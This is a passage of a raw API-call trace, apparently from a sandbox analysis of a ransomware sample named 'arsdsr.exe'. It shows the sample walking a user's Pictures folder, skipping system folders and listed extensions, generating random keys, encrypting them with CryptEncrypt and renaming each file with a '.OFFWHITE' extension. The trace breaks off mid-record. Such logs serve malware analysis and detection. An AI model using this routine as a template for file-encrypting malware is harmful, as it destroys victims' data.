[0135.671] WriteFile (in: hFile=0x21c, lpBuffer=0x521f00*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x521f00*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0135.671] GetProcessHeap () returned 0x500000 [0135.671] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x15a73) returned 0x55a7b8 [0135.671] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.671] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x15a73, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x15a73, lpOverlapped=0x0) returned 1 [0135.678] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.678] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x15a73, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x15a73, lpOverlapped=0x0) returned 1 [0135.678] GetProcessHeap () returned 0x500000 [0135.678] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0135.678] CloseHandle (hObject=0x21c) returned 1 [0135.680] GetProcessHeap () returned 0x500000 [0135.680] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.680] GetProcessHeap () returned 0x500000 [0135.680] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.680] GetProcessHeap () returned 0x500000 [0135.680] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.680] GetProcessHeap () returned 0x500000 [0135.681] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.681] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\IQND JDpAIP.bmp" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\IQND JDpAIP.bmp") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\IQND JDpAIP.bmp" [0135.681] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\IQND JDpAIP.bmp", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\IQND JDpAIP.bmp.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\IQND JDpAIP.bmp.OFFWHITE" [0135.681] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\IQND JDpAIP.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\iqnd jdpaip.bmp"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\IQND JDpAIP.bmp.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\iqnd jdpaip.bmp.offwhite")) returned 1 [0135.682] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb13c28a0, ftCreationTime.dwHighDateTime=0x1d5db64, ftLastAccessTime.dwLowDateTime=0xc3af1c10, ftLastAccessTime.dwHighDateTime=0x1d5e07b, ftLastWriteTime.dwLowDateTime=0xc3af1c10, ftLastWriteTime.dwHighDateTime=0x1d5e07b, nFileSizeHigh=0x0, nFileSizeLow=0x1809c, dwReserved0=0x295debc, dwReserved1=0x3a46be10, cFileName="OzBE1DyfZRPxwh.bmp", cAlternateFileName="OZBE1D~1.BMP")) returned 1 [0135.682] lstrcmpiW (lpString1="OzBE1DyfZRPxwh.bmp", lpString2=".") returned 1 [0135.682] lstrcmpiW (lpString1="OzBE1DyfZRPxwh.bmp", lpString2="..") returned 1 [0135.682] lstrcmpiW (lpString1="OzBE1DyfZRPxwh.bmp", lpString2="...") returned 1 [0135.682] lstrcmpiW (lpString1="OzBE1DyfZRPxwh.bmp", lpString2="windows") returned -1 [0135.682] lstrcmpiW (lpString1="OzBE1DyfZRPxwh.bmp", lpString2="$recycle.bin") returned 1 [0135.682] lstrcmpiW (lpString1="OzBE1DyfZRPxwh.bmp", lpString2="rsa") returned -1 [0135.682] lstrcmpiW (lpString1="OzBE1DyfZRPxwh.bmp", lpString2="ntuser.dat") returned 1 [0135.682] lstrcmpiW (lpString1="OzBE1DyfZRPxwh.bmp", lpString2="programdata") returned -1 [0135.682] lstrcmpiW (lpString1="OzBE1DyfZRPxwh.bmp", lpString2="appdata") returned 1 [0135.682] lstrcmpiW (lpString1="OzBE1DyfZRPxwh.bmp", lpString2="program files") returned -1 [0135.682] lstrcmpiW (lpString1="OzBE1DyfZRPxwh.bmp", lpString2="program files (x86)") returned -1 [0135.682] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\" [0135.682] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\", lpString2="OzBE1DyfZRPxwh.bmp" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\OzBE1DyfZRPxwh.bmp") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\OzBE1DyfZRPxwh.bmp" [0135.682] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.682] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.682] PathFindExtensionW (pszPath="OzBE1DyfZRPxwh.bmp") returned=".bmp" [0135.682] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0135.682] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0135.682] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0135.682] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0135.683] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0135.683] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0135.683] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0135.683] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0135.683] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0135.683] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0135.683] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0135.683] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0135.683] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0135.683] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0135.683] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0135.683] lstrcmpiW (lpString1="OzBE1DyfZRPxwh.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0135.683] GetProcessHeap () returned 0x500000 [0135.683] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x521f10 [0135.683] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\OzBE1DyfZRPxwh.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\ozbe1dyfzrpxwh.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0135.683] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=98460) returned 1 [0135.683] GetProcessHeap () returned 0x500000 [0135.684] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.684] GetProcessHeap () returned 0x500000 [0135.684] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.684] GetProcessHeap () returned 0x500000 [0135.684] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.684] GetProcessHeap () returned 0x500000 [0135.684] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.684] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.684] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.684] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.684] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.684] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.684] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.684] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.684] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.684] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295dc90*=0x100) returned 1 [0135.685] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.685] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.685] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0135.685] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1809c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.685] SetLastError (dwErrCode=0x0) [0135.685] WriteFile (in: hFile=0x21c, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0135.687] GetLastError () returned 0x0 [0135.687] GetLastError () returned 0x0 [0135.688] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1819c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.688] WriteFile (in: hFile=0x21c, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0135.688] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1829c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.688] WriteFile (in: hFile=0x21c, lpBuffer=0x521f10*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x521f10*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0135.688] GetProcessHeap () returned 0x500000 [0135.688] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1809c) returned 0x55a7b8 [0135.688] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.688] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x1809c, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x1809c, lpOverlapped=0x0) returned 1 [0135.697] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.697] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x1809c, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x1809c, lpOverlapped=0x0) returned 1 [0135.698] GetProcessHeap () returned 0x500000 [0135.698] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0135.698] CloseHandle (hObject=0x21c) returned 1 [0135.769] GetProcessHeap () returned 0x500000 [0135.769] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.769] GetProcessHeap () returned 0x500000 [0135.769] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.769] GetProcessHeap () returned 0x500000 [0135.769] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.769] GetProcessHeap () returned 0x500000 [0135.769] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.769] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\OzBE1DyfZRPxwh.bmp" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\OzBE1DyfZRPxwh.bmp") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\OzBE1DyfZRPxwh.bmp" [0135.769] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\OzBE1DyfZRPxwh.bmp", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\OzBE1DyfZRPxwh.bmp.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\OzBE1DyfZRPxwh.bmp.OFFWHITE" [0135.769] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\OzBE1DyfZRPxwh.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\ozbe1dyfzrpxwh.bmp"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\OzBE1DyfZRPxwh.bmp.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\ozbe1dyfzrpxwh.bmp.offwhite")) returned 1 [0135.770] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32776630, ftCreationTime.dwHighDateTime=0x1d5e5fd, ftLastAccessTime.dwLowDateTime=0xbef0d830, ftLastAccessTime.dwHighDateTime=0x1d5e643, ftLastWriteTime.dwLowDateTime=0xbef0d830, ftLastWriteTime.dwHighDateTime=0x1d5e643, nFileSizeHigh=0x0, nFileSizeLow=0x15fca, dwReserved0=0x295debc, dwReserved1=0x3a46be10, cFileName="P9I9zKS6HYWGr1wex.jpg", cAlternateFileName="P9I9ZK~1.JPG")) returned 1 [0135.770] lstrcmpiW (lpString1="P9I9zKS6HYWGr1wex.jpg", lpString2=".") returned 1 [0135.770] lstrcmpiW (lpString1="P9I9zKS6HYWGr1wex.jpg", lpString2="..") returned 1 [0135.770] lstrcmpiW (lpString1="P9I9zKS6HYWGr1wex.jpg", lpString2="...") returned 1 [0135.770] lstrcmpiW (lpString1="P9I9zKS6HYWGr1wex.jpg", lpString2="windows") returned -1 [0135.770] lstrcmpiW (lpString1="P9I9zKS6HYWGr1wex.jpg", lpString2="$recycle.bin") returned 1 [0135.770] lstrcmpiW (lpString1="P9I9zKS6HYWGr1wex.jpg", lpString2="rsa") returned -1 [0135.770] lstrcmpiW (lpString1="P9I9zKS6HYWGr1wex.jpg", lpString2="ntuser.dat") returned 1 [0135.770] lstrcmpiW (lpString1="P9I9zKS6HYWGr1wex.jpg", lpString2="programdata") returned -1 [0135.770] lstrcmpiW (lpString1="P9I9zKS6HYWGr1wex.jpg", lpString2="appdata") returned 1 [0135.771] lstrcmpiW (lpString1="P9I9zKS6HYWGr1wex.jpg", lpString2="program files") returned -1 [0135.771] lstrcmpiW (lpString1="P9I9zKS6HYWGr1wex.jpg", lpString2="program files (x86)") returned -1 [0135.771] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\" [0135.771] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\", lpString2="P9I9zKS6HYWGr1wex.jpg" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\P9I9zKS6HYWGr1wex.jpg") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\P9I9zKS6HYWGr1wex.jpg" [0135.771] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.771] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.771] PathFindExtensionW (pszPath="P9I9zKS6HYWGr1wex.jpg") returned=".jpg" [0135.771] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0135.771] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0135.771] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0135.771] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0135.771] lstrcmpiW (lpString1=".jpg", lpString2=".com") returned 1 [0135.771] lstrcmpiW (lpString1=".jpg", lpString2=".cpl") returned 1 [0135.771] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0135.771] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0135.771] lstrcmpiW (lpString1=".jpg", lpString2=".url") returned -1 [0135.771] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0135.771] lstrcmpiW (lpString1=".jpg", lpString2=".mp3") returned -1 [0135.771] lstrcmpiW (lpString1=".jpg", lpString2=".pif") returned -1 [0135.771] lstrcmpiW (lpString1=".jpg", lpString2=".mp4") returned -1 [0135.771] lstrcmpiW (lpString1=".jpg", lpString2=".OFFWHITE") returned -1 [0135.771] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0135.771] lstrcmpiW (lpString1="P9I9zKS6HYWGr1wex.jpg", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0135.771] GetProcessHeap () returned 0x500000 [0135.771] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x521f20 [0135.772] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\P9I9zKS6HYWGr1wex.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\p9i9zks6hywgr1wex.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0135.772] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=90058) returned 1 [0135.772] GetProcessHeap () returned 0x500000 [0135.772] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.772] GetProcessHeap () returned 0x500000 [0135.772] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.772] GetProcessHeap () returned 0x500000 [0135.772] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.772] GetProcessHeap () returned 0x500000 [0135.772] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.772] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.772] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.772] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.772] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.772] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.772] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.772] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.773] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.773] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295dc90*=0x100) returned 1 [0135.773] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.773] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.773] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0135.773] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x15fca, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.773] SetLastError (dwErrCode=0x0) [0135.773] WriteFile (in: hFile=0x21c, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0135.776] GetLastError () returned 0x0 [0135.776] GetLastError () returned 0x0 [0135.776] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x160ca, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.776] WriteFile (in: hFile=0x21c, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0135.776] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x161ca, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.776] WriteFile (in: hFile=0x21c, lpBuffer=0x521f20*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x521f20*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0135.776] GetProcessHeap () returned 0x500000 [0135.776] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x15fca) returned 0x55a7b8 [0135.776] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.776] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x15fca, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x15fca, lpOverlapped=0x0) returned 1 [0135.783] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.783] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x15fca, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x15fca, lpOverlapped=0x0) returned 1 [0135.783] GetProcessHeap () returned 0x500000 [0135.783] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0135.784] CloseHandle (hObject=0x21c) returned 1 [0135.786] GetProcessHeap () returned 0x500000 [0135.786] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.786] GetProcessHeap () returned 0x500000 [0135.786] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.786] GetProcessHeap () returned 0x500000 [0135.786] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.786] GetProcessHeap () returned 0x500000 [0135.786] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.786] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\P9I9zKS6HYWGr1wex.jpg" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\P9I9zKS6HYWGr1wex.jpg") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\P9I9zKS6HYWGr1wex.jpg" [0135.786] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\P9I9zKS6HYWGr1wex.jpg", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\P9I9zKS6HYWGr1wex.jpg.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\P9I9zKS6HYWGr1wex.jpg.OFFWHITE" [0135.786] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\P9I9zKS6HYWGr1wex.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\p9i9zks6hywgr1wex.jpg"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\P9I9zKS6HYWGr1wex.jpg.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\p9i9zks6hywgr1wex.jpg.offwhite")) returned 1 [0135.787] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1882530, ftCreationTime.dwHighDateTime=0x1d5e2bd, ftLastAccessTime.dwLowDateTime=0x7367c40, ftLastAccessTime.dwHighDateTime=0x1d5de32, ftLastWriteTime.dwLowDateTime=0x7367c40, 